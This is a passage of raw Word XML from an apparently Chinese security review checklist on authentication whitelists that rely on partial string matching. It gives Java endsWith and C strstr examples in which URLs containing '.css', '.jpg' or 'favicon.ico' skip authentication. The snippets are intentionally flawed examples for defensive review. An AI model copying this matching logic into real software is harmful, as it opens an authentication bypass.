          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="1D27F3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>login.cgi</w:t>
      </w:r>
      <w:r w:rsidR="00CF0DE1" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A216A5" w:rsidRPr="00C142B0" w:rsidRDefault="00BA07C9" w:rsidP="00783AEE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="418" w:firstLineChars="210" w:firstLine="422"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783AEE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>解决方案：</w:t>
      </w:r>
      <w:r w:rsidR="00A10490">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参见</w:t>
      </w:r>
      <w:r w:rsidR="00A10490">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0016660F" w:rsidRPr="003B5C76" w:rsidRDefault="00F8580E" w:rsidP="0016660F">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>认证白名单是否依赖局部或模糊匹配作为判断依据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B5C76" w:rsidRPr="003B5C76" w:rsidRDefault="003B5C76" w:rsidP="003B5C76">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003B5C76">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重点排查逻辑判断时Java语言中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0053027C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>subString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0053027C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0053027C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>startsWith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0053027C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0053027C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>endsWith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00DC0672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00DC0672" w:rsidRPr="00DC0672">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>contains</w:t>
      </w:r>
      <w:r w:rsidR="00DC0672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC0672" w:rsidRPr="00DC0672">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等函数的使用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0053027C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>strstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B5C76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>string.substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B5C76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用。</w:t>
      </w:r>
      <w:r w:rsidR="0099647A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查白名单的判断逻辑是否正确、全面</w:t>
      </w:r>
      <w:r w:rsidR="00A80737">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，是否会发生通过简单特征构造就可绕过认证的场景</w:t>
      </w:r>
      <w:r w:rsidR="0099647A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D441D5" w:rsidRDefault="0016660F" w:rsidP="00F75C30">
      <w:pPr>
        <w:ind w:left="839"/>
      </w:pPr>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rStyle w:val="im-content1"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>endsWith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00064428">
        <w:rPr>
          <w:rStyle w:val="im-content1"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rStyle w:val="im-content1"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 局</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部匹配“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016660F">
        <w:t>logout.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”作为是否认证的判断依据</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0FFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>requestURL.endsWith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0FFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(LOGOUT_URL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E724C" w:rsidRDefault="0016660F" w:rsidP="00F75C30">
      <w:pPr>
        <w:ind w:left="839"/>
      </w:pPr>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HW_OS_StrStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>局部匹配</w:t>
      </w:r>
      <w:r w:rsidRPr="00F75C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F75C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="003E724C" w:rsidRPr="00F75C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来作为是否需要认证的判断依据</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HW_NULL == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HW_OS_StrCmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pcUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, "/")</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 HW_NULL_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PTR !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HW_OS_StrStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pcUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, ".gif")</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 HW_NULL_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PTR !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HW_OS_StrStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pcUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, ".jpg")</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 HW_NULL_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PTR !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HW_OS_StrStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pcUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>")</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 HW_NULL_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PTR !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HW_OS_StrStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pcUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, "md5.js")   </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 HW_NULL_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PTR !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HW_OS_StrStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pcUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, "sha256.js")</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 HW_NULL_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PTR !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HW_OS_StrStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pcUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, "favicon.ico")) </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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E724C" w:rsidRPr="00D71415" w:rsidRDefault="003E724C" w:rsidP="00D71415">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sidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D71415">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HW_TRUE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E724C" w:rsidRPr="00D71415" w:rsidRDefault="00D95E79" w:rsidP="00D95E7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hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
